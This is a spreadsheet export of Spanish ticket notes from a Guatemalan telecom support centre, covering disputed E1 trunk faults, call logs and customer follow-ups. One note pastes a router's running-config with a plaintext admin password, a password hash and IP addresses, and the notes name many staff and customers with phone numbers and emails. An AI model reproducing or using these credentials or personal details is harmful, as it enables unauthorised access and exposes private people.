DURACIÓN: 0:01:27
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 34224345
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 25/05/2022 10:06:15</t>
  </si>
  <si>
    <t>############ NOSOTROS COMO AREA DE CNOC, SOPORTE DE PRIMER NIVEL NECESITAMOS SABER Y VERIFICAR QUE ES LO QUE REPORTA EL CLIENTE, NECESITAMOS HACER DESCARTES DE PRIMER NIVEL ########
POR LO QUE  ESPERAMOS QUE CLIENTE REALICE PRUEBAS A NIVEL INTERNO  Y NOS INDIQUE QUE ES LO QUE REPORTAN
##SE HA ENVIADO CORREO A CLIENTE INDICANDOLE QUE ANTES DE REALIZAR CONFERENCIA, NECESITAMOS VERIFICAR SU REPORTE Y SE LE APOYA BRINDANDOLE UN CUESTIONARIO PARA QUE RESPONDA Y SEA FACIL LA DETECCION DE LO QUE REPORTAN##</t>
  </si>
  <si>
    <t>##SE OBSERVA COLA DE CORREOS # SOPORTE DE CLIENTE INDICA REALIZARA PRUEBAS A NIVEL INTERNO + QUE NOS CONTACTARA PARA REALIZAR UNA REUNCION, PERO PRIMERO VERIFICARAN A NIVEL INTERNO ##
DE: APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 16:38
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; ZZZ ECS APMM DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; SOFIA JUAREZ REYES &lt;SOFIA.JUAREZ@MAERSK.COM&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HELLO ALEXANDER CARTAGENA,
WE NEED THE IMPACTED USER TO JOIN THE CALL WITH US AND LOCAL ISP TO MAKE LIVE TESTS, ONCE THE USER SHARE THE AVAILABLE TIME FOR HIM/HER WE WILL ARRANGE THE CALL WITH TELCO TEAM.
REGARDS,
UNNAMED
OMAR ANAN
TECHNICAL SUPPORT ENGINEER
ENTERPRISE NETWORK MANAGEMENT</t>
  </si>
  <si>
    <t>SE REALIZO UNA PRUEBA, LLAMANDO AL GDN 23797200- OPCION: SPANISH OPCION 4
CONTESTA SEÑORITA: KARINA MUÑOS  PIN 3  || QUIEN INDICA QUE ELLA NO HA TENIDO NINGUN TIPO DE PROBLEMA EN LLAMADA ENTRANTE O SALIENTE ##
2001054600
COLA:
NOMBRE: A: 23797200
NÚMERO: 23797200
DURACIÓN: 0:00:31
ESTADO: CONECTADA
DETALLES: 23797200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 25/05/2022 08:37:07</t>
  </si>
  <si>
    <t>CLIENTE HA COMPARTIDO LINK- EN ESTE MOMENTO NOS UNIMOS A CONFERENCIA- ##
HTTPS://TEAMS.MICROSOFT.COM/_#/PRE-JOIN-CALLING/19:MEETING_OTM2NWNKNJMTOTBKMC00Y2ZKLWFLMWMTZDA2MMQ3N2Q0YMUY@THREAD.V2</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTA REVISANDO A NIVEL INTERNO CUAL ES EL REPORTE- Y QUE CUANDO LO TENGA NOS INDICARA.
DE: APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 16:54
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; ZZZ ECS APMM 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 ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HELLO MARIA,
I¿M CHECKING SOMETHING INTERNALLY WITH OUR VOICE TEAM AND WILL GET BACK TO YOU AGAIN.
REGARDS,
UNNAMED
OMAR ANAN
TECHNICAL SUPPORT ENGINEER
ENTERPRISE NETWORK MANAGEMENT</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE CONSULTANDO SOBRE SU AFECTACION, MAS DETALLES POR QUE NO SABE LO QUE REPORTA.
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 15:53
PARA: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
BUENA TARDE ESTIMADOS, TENDRÁN ALGÚN AVANCE?  SOBRE LO SOLICITADO? SE HA DETERMINADO CUAL ES EL PROBLEMA?
HI WHAT PROGRESS HAS BEEN MADE TODAY WITH  YOUR PEOPLE IN THIS CASE? HAS THE TEAM KNOW EXACTLY WHAT THE PROBLEM IS? THE PROBLEM HAS BEEN RESOLVED?
NECESITAMOS SABER CUAL ES EL PROBLEMA, PARA PODER RESOLVERLO.
WE NEED TO KNOW WHAT THE PROBLEM I, SO THAT THE PROBLEM CAN BE FIXED.
ESPERAMOS SU VALIOSA RESPUESTA
WE NEED TO ANSWER.
BEST REGARDS, SALUDOS,</t>
  </si>
  <si>
    <t>SE HA ESPERADO +24 HORAS PARA QUE NOS INDIQUEN CUAL ES EL PROBLEMA PERO NO HAY RESPUESTA- SE PROCEDE AL CIERRE DEL TICKET Y SE ENVIA A CLIENTE CORREO EN DONDE SE EXPRESA QUE SE PROCEDE CON CIERRE DE TICKET PARA QUE VERIFIQUEN A NIVEL INTERNO Y UNICAMENTE  APERTUREN CUANDO SEPAN CUAL ES EL PROBLEMA
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 11:39
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HI OMAR, BECAUSE DONT'  WE  KNOW WHAT THE PROBLEM AND WE NEED MORE INFORMATION ABOUT THIS, I CLOSE THE TICKET FOR YOUR'S  REALIZE TEST AND DETERMINE WHAT'S THE PROBLEM.
PLEASE, ONLY WHEN YOU HAVE RESULT OF YOUR REPORTING, OPEN TO TICKET.
POR FAVOR, APERTURAR TICKET UNICAMENTE CUANDO DETERMINEN CUAL ES EL INCONVENIENTE Y BRINDEN A DETALLE EL INCONVENIENTE.
BEST REGARDS, SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>##NO SE OBSERVA QUE CLIENTE HAYA CONTESTADO ##AUN NO SE SABE QUE REPORTA EL CLIENTE-## NO SE TIENEEN AVANCES POR PARTE DE CLIENTE</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE NUEVAMENTE- SE OBSERVAN 2 COLAS EN LOS CORREOS-  (EN LAS DOS COLAS SE ENVIO EL MISMO CORREO)
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 16:41
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; SOFIA JUAREZ REYES &lt;SOFIA.JUAREZ@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HI! GOOD EVENING, FOR TICKET:
SD1126903
WITH NUMBER RANGE:
ASSIGNED TO  MAERSK SIP  23797200 ¿ 23797299
THIS E1 HAS A SECOND NUMBER RANGE
ASSIGNED TO  VESTA_LOGISTICS  23770500 - 23770599(FOR YOU INFORMATION: THIS E1 HAS A SECOND NUMBER RANGE TOO)
BOTH E1 ARE ACTIVE IN OUR CENTRAL AND  HAVE CALLS IN PROGRESS. THE E1 ASSIGNED TO MAERSK  IS SIP TECHNOLOGY AND THE E1 ASSIGNED TO VESTA_LOGISTICS IS ISDN-PRI TECHNOLOGY.
YOU, AS SUPPORT ,  YOU CAN EXPLAIN TO ME, WHICH IS THE PROBLEM WITH BOTH E1?
THIS INFORMATION HELP US FOR EXPLAIN TO OUR BACK OFFICE AND FIND THE SOLUTION FOR ANY PROBLEM. BEFORE THE METTING WE NEED THIS INFORMATION.
WE WAIT  YOUR ANSWER,
BEST REGARDS,</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE- ACTUALMENTE SOLO PIDE QUE SE REALICE CONFERENCIA PERO NO INIDCA QUE PROBLEMA O SI PERSISTE EL PROBLEMA QUE TIENE. ##EL SERVICIO SE OBSERVA ACTIVO, SEGUN LOS TICKETS ANTERIORES, EL CLIENTE ACA EN GUATEMALA INDICA QUE ESTA TODO OK Y QUE NO SABE QUE ES LO QUE REPORTAN ##
##########ANTES QUE NADA, NECESITAMOS VERIFICAR Y QUE CLIENTE REALICE PRUEBAS CON PR #### POR QUE NO SE OBSERVAN PROBLEMAS EN CLARO ##
A LA ESPERA DE RESPUESTA
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 17:23
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; SOFIA JUAREZ REYES &lt;SOFIA.JUAREZ@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HI!  CLARO SEE THIS SERVICES VESTA_LOGISTICS(23797200 ¿ 23797299 )  &amp; MAERSK SIP (23770500 - 23770599) ACTIVE. NEED  MORE DETAILS ABOUT THE PROBLEM THAT YOU ARE REPORTING FOR HELP US BECAUSE OUR BACK OFFICE NEED MORE DETAILS.
&amp; WE NEED THAT YOUR'S REALIZE TEST WITH YOUR PEOPLE OF GUATEMALA BECAUSE E1'S ARE ACTIVE.
FYI: BEFORE THE METTING WE NEED THIS INFORMATION.
BEST REGARDS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL PROVEEDOR
HELLO,
WE SAW THE SERVICE ACTIVE, CAN YOU MAKE A TEST BY CALLING THE NUMBER. THE CALL COMPLETES.
SO WE WANT TO MAKE SOME TEST WITH THE PEOPLE IN GUATEMALA.
WE WANT TO KNOW EXACTLY THE ISSUE THAT THE USER IS REPORTING TO US.
WE HAVE TALKED TO BYRON GOMEZ, HE SAIDS THE SERVICE ITS OK.</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREOA  A CLIENTE- EN ESPERA DE RESPUESTA- ##NOTA: ANTES DE REALIZAR CONFRENCIA SE HA SOLICITADO A CLIENTE QUE NOS INDIQUE EL INCONVENIENTE CON LOS E1'S QUE REPORTA, DEBIDO A QUE SE OBSERVA EN COLA DE CORREO QUE ESTA REPORTANDO 2 E1'S TOTALMENTE DIFERENTES +  QUE LOS DOS ESTAN ACTIVOS, LLAMADAS COMPLETAN.
###NO SE SABE QUE REPORTA EL CLIENTE ### CLIENTE NO ESPECIFICA##LOS DOS E1'S ESTAN OK## A LA ESPERA DE RESPUESTA
DE: ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 16:13
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ANAN OMAR OBS/CSO &lt;OMAR.ANAN@ORANGE.COM&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ASUNTO: RE: PTT//2205Q20599
HI! GOOD EVENING, FOR TICKET:
SD1126903
WITH NUMBER RANGE:
ASSIGNED TO  MAERSK SIP
23797200 ¿ 23797299
THIS E1 HAS A SECOND NUMBER RANGE
ASSIGNED TO  VESTA_LOGISTICS
 23770500 - 23770599
THIS E1 HAS A SECOND NUMBER RANGE TOO
BOTH E1 ARE ACTIVE IN OUR CENTRAL AND  HAVE CALLS IN PROGRESS. THE E1 ASSIGNED TO MAERSK  IS SIP TECHNOLOGY AND THE E1 ASSIGNED TO VESTA_LOGISTICS IS ISDN-PRI TECHNOLOGY.
YOU, AS SUPPORT ,  YOU CAN EXPLAIN TO ME, WHICH IS THE PROBLEM WITH BOTH E1?
THIS INFORMATION HELP US FOR EXPLIAN TO OUR BACK OFFICE AND FIND THE SOLUTION FOR ANY PROBLEM. BEFORE THE METTING WE NEED THIS INFORMATION.
WE WAIT  YOUR ANSWER,
BEST REGARDS</t>
  </si>
  <si>
    <t>F4576054</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN
-ID 2001128867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANKLIN ORELLANA 44990369 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001122663 - 2001123251</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 25041690/44990369 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO, SE CONSULTA A CNOC CLARO VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4576061</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE MANTENGA EN OBSERVACIÓN PARA MAÑANA A LAS 09:00AM, SE PIDE A GESTIÓN N1 VÍA SKYPE MOVER TICKET A MONITOREO.
SE DEBE VALIDAR SERVICIO A TAL HORA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALBERTO CANDA AL 55272138 CONFIRMA SERVICIO ESTABLE Y SOLICITA QUE SE LE ENVIEN GRAFICAS DEL DIA DE AYER Y LO QUE VA DEL DIA DE HOY AL CORREO ACANDA@SIB.GOB.GT Y LUEGO QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET **
ID 2001074257
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALBERTO CANDA AL 55272138 INDICA QUE POR EL MOMENTO ESTA ESTABLE SOLICITA QUE SE DEJE EN OBSERVACION Y QUE SE LE LLAME MAÑANA A LAS 9:00  AM **
ID 1001987330
**</t>
  </si>
  <si>
    <t>F4576062</t>
  </si>
  <si>
    <t>F4576067</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROCIO RAMIREZ AL 41063909 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001977077
**</t>
  </si>
  <si>
    <t>PERSONAL EN SITIO CLIENTE MIGUEL VIELVA VALIDO SERVICIO EN SITIO REMOTO CON TECNICO || SE PROECEDE CON CIERRE DE FALLA</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL TECNICO JORGE MIRANDA 58265961 QUIEN INDICA QUE NO HAY NADIE DE ADMINISTRACIÓN EN EL CLIENTE, PERSONAL DE SEGURIDAD NO LE PERMITE INGRESO.
1001996783
SE INTENTA AGREGAR A LLAMADA A CLIENTE ROCIO RAMIREZ 41063909 PERO NO RESPONDE
1001997295</t>
  </si>
  <si>
    <t>F4576071</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORELLANA AL 44990369 NO RESPONDE , SE INTENTARA LUEGO **
ID 1001979029
**</t>
  </si>
  <si>
    <t>F4576075</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM ESCOBAR AL 58223754 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001981635
**</t>
  </si>
  <si>
    <t>F4576077</t>
  </si>
  <si>
    <t>####SE VALIDA LAS CONEXIONES CON PERSONAL TECNICO Y EL CLIENTE  EDDER VELASQUEZ ESTA REALIZANDO PRUEBAS POR ESO EN PAC##
ENLACE UP Y SIN PERDIDAS
CONFIG DEL EQUIPO ACTUAL
&lt;OJUINIA4N1W1A01A01EID1&gt;TELNET VPN-INSTANCE INTERNET_NI_DEPTAL 10.15.48.126
TRYING 10.15.48.126 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.15.48.126 ...
USER ACCESS VERIFICATION
USERNAME: VJPALENCIA
PASSWORD:
% LOGIN INVALID
USERNAME: SOPORTEDX
PASSWORD:
% LOGIN INVALID
USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;OJUINIA4N1W1A01A01EID1&gt;SOPORTE
                        ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;OJUINIA4N1W1A01A01EID1&gt;SOPORTE
                        ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;OJUINIA4N1W1A01A01EID1&gt;TELNET VPN-INSTANCE INTERNET_NI_DEPTAL 10.15.48.126
TRYING 10.15.48.126 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.15.48.126 ...
USER ACCESS VERIFICATION
USERNAME: SOPORTE
PASSWORD:
% LOGIN INVALID
USERNAME: ADMINDX
PASSWORD:
AMT_UNO_PRONTO_SANTO_TOMAS&gt;ENABLE
PASSWORD:
AMT_UNO_PRONTO_SANTO_TOMAS#SHOW RUN
AMT_UNO_PRONTO_SANTO_TOMAS#SHOW RUNNING-CONFIG
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 1501 BYTES
!
! LAST CONFIGURATION CHANGE AT 17:46:53 UTC WED MAY 25 2022
!
VERSION 15.6
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME AMT_UNO_PRONTO_SANTO_TOMAS
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$3M3X$5SZ4LFEOLG/JRFPD5P03M/
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME ADMINDX PASSWORD 0 @DMINDX
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!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IP ADDRESS 10.15.48.126 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 IP ADDRESS 186.77.179.1 255.255.255.0
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
!
!
!
LINE CON 0
 EXEC-TIMEOUT 30 0
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 NO MODEM ENABLE
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 0 4
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
LLAMADA CON TECNICO
2001130857
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 0057274139
NÚMERO: 0057274139
DURACIÓN: 0:14:10
ESTADO: CONECTADA
DETALLES: 0057274139
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 25/05/2022 12:13:19
2001148819
COLA:
NOMBRE: A: 50557274139
NÚMERO: 50557274139
DURACIÓN: 0:01:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50557274139
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 25/05/2022 12:54:45</t>
  </si>
  <si>
    <t>F4576086</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 17:43
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; 'WALTER ANIBAL REYES' &lt;WALTER.REYES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; 'NOC ALIMENTOS' &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C136 - LENTITUD ENLACE DE INTERNET - CON ID 625900158
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4576088</t>
  </si>
  <si>
    <t>CLIENTE NO RESPONDE LLAMADAS--</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A EJECUTIVO DE CUENTA PARA QUE SE ENUENTRE ENTERADO INFORMACION BRINDADA POR DX--</t>
  </si>
  <si>
    <t>SE VALIDA QUE SERVICIO HA ESTADO TRABAJANDO CON MASCARA 255.255.255.240 DESDE REPORTES ANTERIORES. SE VALIDARA CON CLIENTE -----</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERMIN RIVAS 70270841 NO RESPONDE, ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
ID 2001221622 - 2001221814
**</t>
  </si>
  <si>
    <t>F4576089</t>
  </si>
  <si>
    <t>###SE HACE CONFERENCIA CON CLIENTE Y TECNICOS PARA REALIZAR VISITA . AVANCES EN 30  MINUTOS###
2001982729
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:00:28
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 30/05/2022 08:59:42</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO DE LA AGENCIA 46273370 LINEA VIVO, CLIENTE INDICA QUE YA LE HABIAN LLAMADO ANTERIORMENTE Y LE INDICARON QUE ENVIARIAN TECNICO A VERIFICAR LA FALLA, SE SOLICITA NUMERO DE TICKET PERO INDICA QUE NO LO TIENE, SE SOLICITA NUEVAMENTE VALIDAR EQUIPOS PERO NO ACCEDE A REALZIAR PRUEBAS, INDICA NUEVAMENTE QUE LES OFRECIERON EN LLAMADA QUE ENVIARIAN TECNICO, NO SE LOGRA UBICAR TT REACTIVO O PROACTIVO POR LO QUE SE SOLICITA APOYO CON FALLA ACTUAL.</t>
  </si>
  <si>
    <t>F4576095</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AZUCENA MARTINEZ PERO NO CONTESTA.
1001973251, 1001973389,
COLA:
NOMBRE: A: 0050376032932
NÚMERO: 0050376032932
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 0050376032932
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/05/2022 15:45:16</t>
  </si>
  <si>
    <t>SE LLAMO AL OTRO NUMERO DEL CLIENTE AZUCENA QUIEN INDICA QUE EL SERVICIO YA ESTA FUNCIONANDO Y SOLICITA EL CIERRE.
1001973835
COLA:
NOMBRE: A: 0050376007751
NÚMERO: 0050376007751
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 0050376007751
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
